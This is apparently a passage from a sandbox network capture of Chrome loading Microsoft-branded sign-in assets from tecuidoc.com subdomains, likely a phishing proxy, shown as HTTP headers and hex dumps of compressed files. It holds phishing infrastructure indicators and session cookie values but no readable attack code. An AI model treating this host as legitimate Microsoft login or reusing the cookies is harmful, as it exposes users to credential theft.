                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                              Sec-WebSocket-Key: +A0DlZu3oDiAnwOzoIJGYQ==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:56:53 UTC740INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:53 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: aa5ce125-d4f6-4944-8a79-fc1226473301
                                              x-ms-ests-server: 2.1.17846.6 - NEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.649742198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:51 UTC549OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:54 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:54 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:46 GMT
                                              etag: 0x8DB5C3F47E260FD
                                              x-ms-request-id: 3a3df093-601e-0034-71ae-966887000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145653Z-178cffcc9b5gfhpzcnxpkuy9n400000001hg000000007r8q
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:54 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                              Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                              2024-04-26 14:56:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.649741198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:51 UTC550OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:54 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:54 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:48 GMT
                                              etag: 0x8DB5C3F4911527F
                                              x-ms-request-id: 193a5faa-701e-002d-51b4-97abb6000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145653Z-15d7758b5db95b97ugaf1g6rqc00000000k0000000003a91
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:54 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                              Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                              2024-04-26 14:56:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.649744198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:52 UTC550OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:54 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:54 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:49 GMT
                                              etag: 0x8DB5C3F49ED96E0
                                              x-ms-request-id: af6f8332-c01e-0012-05a5-9603b8000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145654Z-17b579f75f7vsvkssbafh53g0w00000002q000000000517e
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:54 UTC628INData Raw: 32 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b
                                              Data Ascii: 26d}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;
                                              2024-04-26 14:56:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.649743198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:52 UTC536OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:54 UTC758INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:54 GMT
                                              Content-Type: image/x-icon
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                              etag: 0x8D8731230C851A6
                                              x-ms-request-id: c4df88c8-801e-003a-3e7b-91ca9a000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145654Z-186b7b7b98dxx7m8xww8rv5t5c0000000ceg000000003va9
                                              x-fd-int-roxy-purgeid: 0
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              2024-04-26 14:56:54 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                              Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                              2024-04-26 14:56:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.649747198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:58 UTC707OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                              Sec-WebSocket-Key: MZ7EZBIZvf5QbUMs1CD57w==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:57:00 UTC737INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:00 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: 07c1adb9-604a-40df-8adf-35ce33ea1601
                                              x-ms-ests-server: 2.1.17846.6 - FRC ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.649749198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:01 UTC746OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_presetpasswordsplitter_3c78f555810791db83a9.js HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:04 UTC811INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:04 GMT
                                              Content-Type: application/x-javascript
                                              Content-Length: 1669
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Thu, 15 Feb 2024 19:13:16 GMT
                                              etag: 0x8DC2E5A2A09A4B0
                                              x-ms-request-id: 131ae446-101e-003b-10bf-97e198000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145703Z-15d7758b5dbbqrrtprsc8eq5xw00000000fg00000000b55z
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:57:04 UTC1669INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 57 7f 73 da 36 18 fe bf 9f 42 f1 fe 00 1a db fc 0a 09 a1 65 77 6d 92 2e e9 9a 86 0b ac bb 5d c8 71 42 16 a0 c4 96 7c 92 0c 61 09 df 7d af 84 4d 30 21 5d da de ee b6 5b ee 82 41 7a 7f 3f ef f3 4a 2e bf de 79 85 5e 23 ef e5 7f a8 db 7b 77 d9 43 17 1f 50 ef f4 ec f2 18 75 e0 d7 1f e8 f3 45 ef ec e8 e4 e5 76 8c 53 f3 df 9b 30 85 46 2c a4 08 9e 43 ac 68 80 04 47 42 22 c6 89 90 b1 90 58 53 85 22 f8 94 0c 87 68 24 45 84 f4 84 a2 58 8a 1b 4a b4 42 21 53 1a 94 86 34 14 33 54 04 73 32 40 1d 2c f5 1c 9d 75 4a 3e d8 a7 60 8d 8d 19 07 6d 22 e2 39 7c 9f 68 c4 85 66 84 22 cc 03 6b 2d 84 1f 5c 51 94 f0 80 4a 34 9b 30 32 41 e7 8c 48 a1 c4 48 23 49 09 65 53 70 a2 12 58 cf bb 70 11 96 14 29 aa d1 48 48 3d 59 c6 e1 a3 ae 91 4c ad 2a eb 66 e9
                                              Data Ascii: Ws6Bewm.]qB|a}M0!][Az?J.y^#{wCPuEvS0F,ChGB"XS"h$EXJB!S43Ts2@,uJ>`m"9|hf"k-\QJ402AHH#IeSpXp)HH=YL*f


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.649750198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:01 UTC794OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:04 UTC761INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:04 GMT
                                              Content-Type: image/gif
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:47 GMT
                                              etag: 0x8DB5C3F48EC4154
                                              x-ms-request-id: 98ae329a-d01e-005f-7eb3-970fb2000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145704Z-17b579f75f7p5k78snsf0msm0g00000000f0000000000uvb
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              2024-04-26 14:57:04 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                              Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                              2024-04-26 14:57:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.649751198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:01 UTC788OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:04 UTC755INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:04 GMT
                                              Content-Type: image/gif
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:48 GMT
                                              etag: 0x8DB5C3F4904824B
                                              x-ms-request-id: 393f1cb2-101e-002b-4c8b-9151ba000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145703Z-186b7b7b98dt5mjf93ecx937nn0000000ccg0000000012aa
                                              x-fd-int-roxy-purgeid: 0
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              2024-04-26 14:57:04 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                              Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                              2024-04-26 14:57:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
